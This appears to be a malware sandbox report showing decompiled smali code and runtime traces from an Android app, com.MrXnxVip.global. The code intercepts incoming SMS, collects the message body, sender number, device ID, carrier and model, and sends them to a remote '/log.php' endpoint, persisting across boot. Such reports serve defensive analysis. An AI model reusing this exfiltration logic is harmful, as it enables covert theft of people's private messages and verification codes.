                        124invoke-virtual {p2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        125move-result-object p2
                        127sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        129invoke-virtual {p1, p2, v0}, Lcom/MrXnxVip/global/httpjob;->_vvvvvvv6(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        130goto/16 :goto_0
                        131pswitch_ae: iput v2, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        132iput p2, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->catchState:I
                        133const/16 p1, 0x9
                        134iput p1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        135goto/16 :goto_0
                        136pswitch_b8: const/4 p1, 0x7
                        137iput p1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        139sget-object p1, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        141sget-object p1, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        143invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirInternal()Ljava/lang/String;
                        • Time: 689634
                          • Return:
                            • /data/user/0/com.MrXnxVip.global/files
                        144move-result-object p1
                        146const-string p2, "NULL.txt"
                        148const-string v0, "HelloWorld"
                        150invoke-static {p1, p2, v0}, Lanywheresoftware/b4a/objects/streams/File;->WriteString(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
                        151iput-object v1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->_manu:Ljava/lang/String;
                        152iput-object v1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->_modl:Ljava/lang/String;
                        154sget-object p1, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        156invoke-static {}, Lanywheresoftware/b4a/phone/Phone;->getManufacturer()Ljava/lang/String;
                        • Time: 690019
                          • Return:
                            • java.lang.String@eacb771
                        157move-result-object p1
                        158iput-object p1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->_manu:Ljava/lang/String;
                        160sget-object p1, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        162invoke-static {}, Lanywheresoftware/b4a/phone/Phone;->getModel()Ljava/lang/String;
                        • Time: 690126
                          • Return:
                            • Galaxy Nexus
                        163move-result-object p1
                        164iput-object p1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->_modl:Ljava/lang/String;
                        166sget-object p1, Lcom/MrXnxVip/global/firebasemessaging;->_v6:Lcom/reza/sh/deviceinfo/DiviceInfo;
                        168invoke-virtual {p1}, Lcom/reza/sh/deviceinfo/DiviceInfo;->getAndroidID()Ljava/lang/String;
                        • Time: 690137
                          • This:
                            • com.reza.sh.deviceinfo.DiviceInfo@97b14e2
                          • Return:
                            • d3ccba0fb60b1a86
                        169move-result-object p1
                        170sput-object p1, Lcom/MrXnxVip/global/firebasemessaging;->_vv3:Ljava/lang/String;
                        171new-instance p1, Ljava/lang/StringBuilder;
                        173invoke-direct {p1}, Ljava/lang/StringBuilder;-><init>()V
                        175iget-object p2, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->_manu:Ljava/lang/String;
                        177invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        179const-string p2, " - "
                        181invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        183iget-object p2, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->_modl:Ljava/lang/String;
                        185invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        187invoke-virtual {p1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        188move-result-object p1
                        189sput-object p1, Lcom/MrXnxVip/global/firebasemessaging;->_vv4:Ljava/lang/String;
                        191sget-object p1, Lcom/MrXnxVip/global/firebasemessaging;->_v6:Lcom/reza/sh/deviceinfo/DiviceInfo;
                        193invoke-virtual {p1}, Lcom/reza/sh/deviceinfo/DiviceInfo;->getCarrier()Ljava/lang/String;
                        • Time: 690537
                          • This:
                            • com.reza.sh.deviceinfo.DiviceInfo@97b14e2
                          • Return:
                            • ~i:** Service (newmessage1) Start **
                        194move-result-object p1
                        195sput-object p1, Lcom/MrXnxVip/global/firebasemessaging;->_vv5:Ljava/lang/String;
                        197sget-object p1, Lcom/MrXnxVip/global/firebasemessaging;->_v6:Lcom/reza/sh/deviceinfo/DiviceInfo;
                        199invoke-virtual {p1}, Lcom/reza/sh/deviceinfo/DiviceInfo;->getOSVersion()Ljava/lang/String;
                        • Time: 690542
                          • Return:
                            • ** Service (newmessage1) Start **
                        200move-result-object p1
                        201sput-object p1, Lcom/MrXnxVip/global/firebasemessaging;->_vv6:Ljava/lang/String;
                        202goto/16 :goto_0
                        203pswitch_112: iput v3, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        205invoke-static {}, Lcom/MrXnxVip/global/firebasemessaging;->_check_install()Z
                        • Time: 689633
                          • Return:
                            • false
                        • Time: 695949
                          • Return:
                            • true
                        206move-result p1
                        207if-nez p1, :cond_0
                        208const/4 p1, 0x6
                        209iput p1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        210goto/16 :goto_0
                        211pswitch_11f: const/4 p1, 0x4
                        212iput p1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        214sget-object p1, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvvv4:Lanywheresoftware/b4a/objects/FirebaseNotificationsService$FirebaseMessageWrapper;
                        216iget-object p2, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->_startingintent:Lanywheresoftware/b4a/objects/IntentWrapper;
                        218invoke-virtual {p2}, Lanywheresoftware/b4a/objects/IntentWrapper;->getObject()Ljava/lang/Object;
                        219move-result-object p2
                        220check-cast p2, Landroid/content/Intent;
                        222invoke-virtual {p1, p2}, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$FirebaseMessageWrapper;->HandleIntent(Landroid/content/Intent;)Z
                        223goto/16 :goto_0
                        224pswitch_131: iput v4, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        226iget-object p1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->_startingintent:Lanywheresoftware/b4a/objects/IntentWrapper;
                        228invoke-virtual {p1}, Lanywheresoftware/b4a/objects/IntentWrapper;->IsInitialized()Z
                        • Time: 689622
                          • This:
                            • android.content.Intent@98f2094
                          • Return:
                            • class android.content.Intent
                            • getName: android.content.Intent
                        • Time: 689625
                          • This:
                            • (Intent) Intent { cmp=com.MrXnxVip.global/.firebasemessaging }
                          • Return:
                            • java.lang.String@456273d
                        • Time: 689621
                          • This:
                            • (Intent) Intent { cmp=com.MrXnxVip.global/.firebasemessaging }
                          • Return:
                            • true
                        • Time: 695935
                          • This:
                            • (Intent) Intent { cmp=com.MrXnxVip.global/.firebasemessaging }
                          • Return:
                            • java.lang.String@b681ffd
                        • Time: 696757
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@b2a64c2
                        • Time: 702741
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@aeabf47
                        • Time: 709965
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@358513c
                        • Time: 716171
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@3d6f93b
                        • Time: 723738
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@e058434
                        • Time: 729873
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@97f40d0
                        • Time: 736098
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@3e13ddf
                        • Time: 767278
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@246e519
                        • Time: 774415
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@c3bc245
                        • Time: 780536
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@b0e1931
                        • Time: 786979
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@35d6287
                        • Time: 792929
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@55d5702
                        • Time: 798980
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@5ffb1b9
                        • Time: 804999
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@4157dc
                        • Time: 811028
                          • This:
                            • (Intent) Intent { flg=0x14 cmp=com.MrXnxVip.global/.firebasemessaging$firebasemessaging_BR (has extras) }
                          • Return:
                            • java.lang.String@5c280f8
                        • Time: 812077
                          • This:
                            • (Intent) Intent { act=android.intent.action.BOOT_COMPLETED }
                          • Return:
                            • java.lang.String@e80409c
                        • 8 additional calls hidden ...
                        229move-result p1
                        230if-ne p1, v0, :cond_140
                        231const/4 p1, 0x3
                        232iput p1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        233goto/16 :goto_0
                        234cond_140: const/16 p1, 0xf
                        235iput p1, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        236goto/16 :goto_0
                        237pswitch_146: iput v0, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        239sget-object p1, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        241sget-object p2, Lanywheresoftware/b4a/keywords/Common;->DateTime:Lanywheresoftware/b4a/keywords/DateTime;
                        243invoke-static {}, Lanywheresoftware/b4a/keywords/DateTime;->getNow()J
                        244move-result-wide v2
                        245long-to-double v2, v2
                        247sget-object p2, Lanywheresoftware/b4a/keywords/Common;->DateTime:Lanywheresoftware/b4a/keywords/DateTime;
                        248try_end_153: const-wide v6, 0x40b7700000000000L # 6000.0
                        250invoke-static {v2, v3}, Ljava/lang/Double;->isNaN(D)Z
                        251add-double/2addr v2, v6
                        252double-to-long v2, v2
                        253try_start_15d:
                        254invoke-static {p1, v1, v2, v3, v5}, Lanywheresoftware/b4a/keywords/Common;->StartServiceAt(Lanywheresoftware/b4a/BA;Ljava/lang/Object;JZ)V
                        255try_end_160: goto/16 :goto_0
                        256pswitch_162: return-void
                        257catch_163: move-exception p1
                        258iget p2, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->catchState:I
                        259if-eqz p2, :cond_173
                        260iget p2, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->catchState:I
                        261iput p2, p0, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_Service_Start;->state:I
                        263sget-object p2, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        265invoke-virtual {p2, p1}, Lanywheresoftware/b4a/BA;->setLastException(Ljava/lang/Exception;)V
                        266goto/16 :goto_0
                        267cond_173: goto/16 :goto_175
                        268goto_174: throw p1
                        269goto_175: goto/16 :goto_174
                        APIs
                        • java.lang.String.equals
                        • com.MrXnxVip.global.newmessage1.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.newmessage1._v6:Lcom/reza/sh/deviceinfo/DiviceInfo
                        • com.MrXnxVip.global.newmessage1._v6:Lcom/reza/sh/deviceinfo/DiviceInfo
                        • com.MrXnxVip.global.newmessage1._v6:Lcom/reza/sh/deviceinfo/DiviceInfo
                        • com.MrXnxVip.global.newmessage1._v6:Lcom/reza/sh/deviceinfo/DiviceInfo
                        • com.MrXnxVip.global.newmessage1._v6:Lcom/reza/sh/deviceinfo/DiviceInfo
                        • java.lang.StringBuilder.<init>
                        • com.MrXnxVip.global.newmessage1._vvvv1:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.newmessage1._vvvv2:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.newmessage1._vv4:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.newmessage1._vvvvvvvvvvv2
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • com.MrXnxVip.global.newmessage1._vv4:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.newmessage1._v5:Lcom/MrXnxVip/global/httpjob
                        • java.lang.StringBuilder.<init>
                        • com.MrXnxVip.global.newmessage1.mostCurrent:Lcom/MrXnxVip/global/newmessage1
                        • com.MrXnxVip.global.newmessage1._vvvvvvvvvv3:Lcom/MrXnxVip/global/information
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • android.intent.action.BOOT_COMPLETED
                        • android.provider.Telephony.SMS_RECEIVED
                        • java.lang.String@9a68041
                        • java.lang.String@a593b4d
                        • java.lang.String@f2308cc
                        • body
                        • GET
                        • number
                        • d3ccba0fb60b1a86
                        • t-mobile_deutschland_gmbh
                        • samsung
                        • Galaxy Nexus
                        • Galaxy_Nexus
                        • -
                        • offlinemode.txt
                        • OFFLINE TARGET
                        • \n
                        • AndroidID :
                        • offlinemode2.txt
                        • result=ok&action=nwmessage&messagetext=
                        • &number=
                        • &androidid=
                        • &model=
                        • &battry=
                        • &opr=
                        • /log.php
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/Exception;
                        3}
                        4.end annotation
                        6invoke-virtual {p0}, Lanywheresoftware/b4a/objects/IntentWrapper;->getAction()Ljava/lang/String;
                        • Time: 696066
                          • This:
                            • (Intent) Intent { cmp=com.MrXnxVip.global/.newmessage1 }
                          • Return:
                            • java.lang.String@a593b4d
                        • Time: 812143
                          • This:
                            • (Intent) Intent { act=android.intent.action.BOOT_COMPLETED }
                          • Return:
                            • java.lang.String@f2308cc
                        • Time: 812141
                          • This:
                            • (Intent) Intent { act=android.intent.action.BOOT_COMPLETED }
                          • Return:
                            • android.intent.action.BOOT_COMPLETED
                        • Time: 819991
                          • This:
                            • (Intent) Intent { act=android.provider.Telephony.SMS_RECEIVED (has extras) }
                          • Return:
                            • java.lang.String@9a68041
                        • Time: 819987
                          • This:
                            • (Intent) Intent { act=android.provider.Telephony.SMS_RECEIVED (has extras) }
                          • Return:
                            • android.provider.Telephony.SMS_RECEIVED
                        7move-result-object v0
                        9const-string v1, "android.provider.Telephony.SMS_RECEIVED"
                        11invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        12move-result v0
                        14const-string v1, ""
                        15if-eqz v0, :cond_146
                        16new-instance v0, Lanywheresoftware/b4j/object/JavaObject;
                        18invoke-direct {v0}, Lanywheresoftware/b4j/object/JavaObject;-><init>()V
                        20sget-object v2, Lcom/MrXnxVip/global/newmessage1;->processBA:Lanywheresoftware/b4a/BA;
                        22invoke-virtual {v0, v2}, Lanywheresoftware/b4j/object/JavaObject;->InitializeContext(Lanywheresoftware/b4a/BA;)Lanywheresoftware/b4j/object/JavaObject;
                        23const/4 v2, 0x2
                        24new-array v3, v2, [Ljava/lang/Object;
                        26const-string v4, "body"
                        27const/4 v5, 0x0
                        28aput-object v4, v3, v5
                        30invoke-virtual {p0}, Lanywheresoftware/b4a/objects/IntentWrapper;->getObject()Ljava/lang/Object;
                        31move-result-object v4
                        32const/4 v6, 0x1
                        33aput-object v4, v3, v6
                        35const-string v4, "GET"
                        37invoke-virtual {v0, v4, v3}, Lanywheresoftware/b4j/object/JavaObject;->RunMethod(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object;
                        38move-result-object v3
                        40invoke-static {v3}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        41move-result-object v3
                        42new-array v2, v2, [Ljava/lang/Object;
                        44const-string v7, "number"
                        45aput-object v7, v2, v5
                        47invoke-virtual {p0}, Lanywheresoftware/b4a/objects/IntentWrapper;->getObject()Ljava/lang/Object;
                        48move-result-object p0
                        49aput-object p0, v2, v6
                        51invoke-virtual {v0, v4, v2}, Lanywheresoftware/b4j/object/JavaObject;->RunMethod(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object;
                        52move-result-object p0
                        54invoke-static {p0}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        55move-result-object p0
                        57sget-object v0, Lcom/MrXnxVip/global/newmessage1;->_v6:Lcom/reza/sh/deviceinfo/DiviceInfo;
                        59invoke-virtual {v0}, Lcom/reza/sh/deviceinfo/DiviceInfo;->getAndroidID()Ljava/lang/String;
                        • Time: 820047
                          • This:
                            • com.reza.sh.deviceinfo.DiviceInfo@3df21a5
                          • Return:
                            • d3ccba0fb60b1a86
                        60move-result-object v0
                        62sget-object v2, Lcom/MrXnxVip/global/newmessage1;->_v6:Lcom/reza/sh/deviceinfo/DiviceInfo;
                        64invoke-virtual {v2}, Lcom/reza/sh/deviceinfo/DiviceInfo;->getCarrier()Ljava/lang/String;
                        • Time: 820055
                          • This:
                            • com.reza.sh.deviceinfo.DiviceInfo@3df21a5
                          • Return:
                            • t-mobile_deutschland_gmbh
                        65move-result-object v2
                        67sget-object v4, Lcom/MrXnxVip/global/newmessage1;->_v6:Lcom/reza/sh/deviceinfo/DiviceInfo;
                        69invoke-virtual {v4}, Lcom/reza/sh/deviceinfo/DiviceInfo;->getBatteryPercentage()I
                        70move-result v4
                        72invoke-static {v4}, Lanywheresoftware/b4a/BA;->NumberToString(I)Ljava/lang/String;
                        73move-result-object v4
                        74sput-object v1, Lcom/MrXnxVip/global/newmessage1;->_vvvv1:Ljava/lang/String;
                        75sput-object v1, Lcom/MrXnxVip/global/newmessage1;->_vvvv2:Ljava/lang/String;
                        77sget-object v5, Lcom/MrXnxVip/global/newmessage1;->_v6:Lcom/reza/sh/deviceinfo/DiviceInfo;
                        79invoke-virtual {v5}, Lcom/reza/sh/deviceinfo/DiviceInfo;->getManufacturer()Ljava/lang/String;
                        • Time: 820059
                          • Return:
                            • java.lang.String@eacb771
                        80move-result-object v5
                        81sput-object v5, Lcom/MrXnxVip/global/newmessage1;->_vvvv1:Ljava/lang/String;
                        83sget-object v5, Lcom/MrXnxVip/global/newmessage1;->_v6:Lcom/reza/sh/deviceinfo/DiviceInfo;
                        85invoke-virtual {v5}, Lcom/reza/sh/deviceinfo/DiviceInfo;->getModel()Ljava/lang/String;
                        • Time: 820061
                          • Return:
                            • Galaxy Nexus
                        • Time: 820062
                          • This:
                            • com.reza.sh.deviceinfo.DiviceInfo@3df21a5
                          • Return:
                            • Galaxy_Nexus
                        86move-result-object v5
                        87sput-object v5, Lcom/MrXnxVip/global/newmessage1;->_vvvv2:Ljava/lang/String;
                        88new-instance v5, Ljava/lang/StringBuilder;
                        90invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V
                        92sget-object v6, Lcom/MrXnxVip/global/newmessage1;->_vvvv1:Ljava/lang/String;
                        94invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        96const-string v6, " - "
                        98invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        100sget-object v6, Lcom/MrXnxVip/global/newmessage1;->_vvvv2:Ljava/lang/String;
                        102invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        104invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        105move-result-object v5
                        106sput-object v5, Lcom/MrXnxVip/global/newmessage1;->_vv4:Ljava/lang/String;
                        108sget-object v5, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        110sget-object v5, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        112invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirInternal()Ljava/lang/String;
                        113move-result-object v5
                        115const-string v6, "offlinemode.txt"
                        117invoke-static {v5, v6}, Lanywheresoftware/b4a/objects/streams/File;->Exists(Ljava/lang/String;Ljava/lang/String;)Z
                        118move-result v5
                        119if-eqz v5, :cond_ef
                        120new-instance v5, Lanywheresoftware/b4a/keywords/StringBuilderWrapper;
                        122invoke-direct {v5}, Lanywheresoftware/b4a/keywords/StringBuilderWrapper;-><init>()V
                        124invoke-virtual {v5}, Lanywheresoftware/b4a/keywords/StringBuilderWrapper;->Initialize()V
                        125new-instance v6, Ljava/lang/StringBuilder;
                        127invoke-direct {v6}, Ljava/lang/StringBuilder;-><init>()V
                        129const-string v7, "OFFLINE TARGET "
                        131invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        133sget-object v7, Lcom/MrXnxVip/global/newmessage1;->_vv4:Ljava/lang/String;
                        135invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        137invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        138move-result-object v6
                        140invoke-virtual {v5, v6}, Lanywheresoftware/b4a/keywords/StringBuilderWrapper;->Append(Ljava/lang/String;)Lanywheresoftware/b4a/keywords/StringBuilderWrapper;
                        141move-result-object v6
                        143const-string v7, "\n"
                        145invoke-virtual {v6, v7}, Lanywheresoftware/b4a/keywords/StringBuilderWrapper;->Append(Ljava/lang/String;)Lanywheresoftware/b4a/keywords/StringBuilderWrapper;
                        146move-result-object v6
                        147new-instance v8, Ljava/lang/StringBuilder;
                        149invoke-direct {v8}, Ljava/lang/StringBuilder;-><init>()V
                        151const-string v9, "AndroidID : "
                        153invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        155invoke-virtual {v8, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        157invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        158move-result-object v8
                        160invoke-virtual {v6, v8}, Lanywheresoftware/b4a/keywords/StringBuilderWrapper;->Append(Ljava/lang/String;)Lanywheresoftware/b4a/keywords/StringBuilderWrapper;
                        161move-result-object v6
                        163invoke-virtual {v6, v7}, Lanywheresoftware/b4a/keywords/StringBuilderWrapper;->Append(Ljava/lang/String;)Lanywheresoftware/b4a/keywords/StringBuilderWrapper;
                        164move-result-object v6
                        166invoke-virtual {v6, v3}, Lanywheresoftware/b4a/keywords/StringBuilderWrapper;->Append(Ljava/lang/String;)Lanywheresoftware/b4a/keywords/StringBuilderWrapper;
                        168sget-object v6, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        170sget-object v6, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        172invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirInternal()Ljava/lang/String;
                        173move-result-object v6
                        175const-string v7, "offlinemode2.txt"
                        177invoke-static {v6, v7}, Lanywheresoftware/b4a/objects/streams/File;->ReadString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        178move-result-object v6
                        180invoke-static {v5}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        181move-result-object v5
                        183invoke-static {v6, v5}, Lcom/MrXnxVip/global/newmessage1;->_vvvvvvvvvvv2(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        184cond_ef: new-instance v5, Ljava/lang/StringBuilder;
                        186invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V
                        188const-string v6, "result=ok&action=nwmessage&messagetext="
                        190invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        192invoke-virtual {v5, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        194const-string v3, "&number="
                        196invoke-virtual {v5, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        198invoke-virtual {v5, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        200const-string p0, "&androidid="
                        202invoke-virtual {v5, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        204invoke-virtual {v5, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        206const-string p0, "&model="
                        208invoke-virtual {v5, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        210sget-object p0, Lcom/MrXnxVip/global/newmessage1;->_vv4:Ljava/lang/String;
                        212invoke-virtual {v5, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        214const-string p0, "&battry="
                        216invoke-virtual {v5, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        218invoke-virtual {v5, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        220const-string p0, "&opr="
                        222invoke-virtual {v5, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        224invoke-virtual {v5, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        226invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        227move-result-object p0
                        229sget-object v0, Lcom/MrXnxVip/global/newmessage1;->_v5:Lcom/MrXnxVip/global/httpjob;
                        230new-instance v2, Ljava/lang/StringBuilder;
                        232invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        234sget-object v3, Lcom/MrXnxVip/global/newmessage1;->mostCurrent:Lcom/MrXnxVip/global/newmessage1;
                        236iget-object v3, v3, Lcom/MrXnxVip/global/newmessage1;->_vvvvvvvvvv3:Lcom/MrXnxVip/global/information;
                        238sget-object v3, Lcom/MrXnxVip/global/information;->_vvvv6:Ljava/lang/String;
                        240invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        242const-string v3, "/log.php"
                        244invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        246invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        247move-result-object v2
                        249invoke-virtual {v0, v2, p0}, Lcom/MrXnxVip/global/httpjob;->_vvvvvvv6(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        250cond_146: return-object v1
                        Cross References
                        APIs
                        • java.lang.System.out:Ljava/io/PrintStream
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.io.PrintStream.println
                        • java.lang.ThreadLocal.set
                        • java.lang.ThreadLocal.set
                        • java.util.HashMap.get
                        • java.lang.reflect.Method.invoke
                        • java.lang.ThreadLocal.set
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
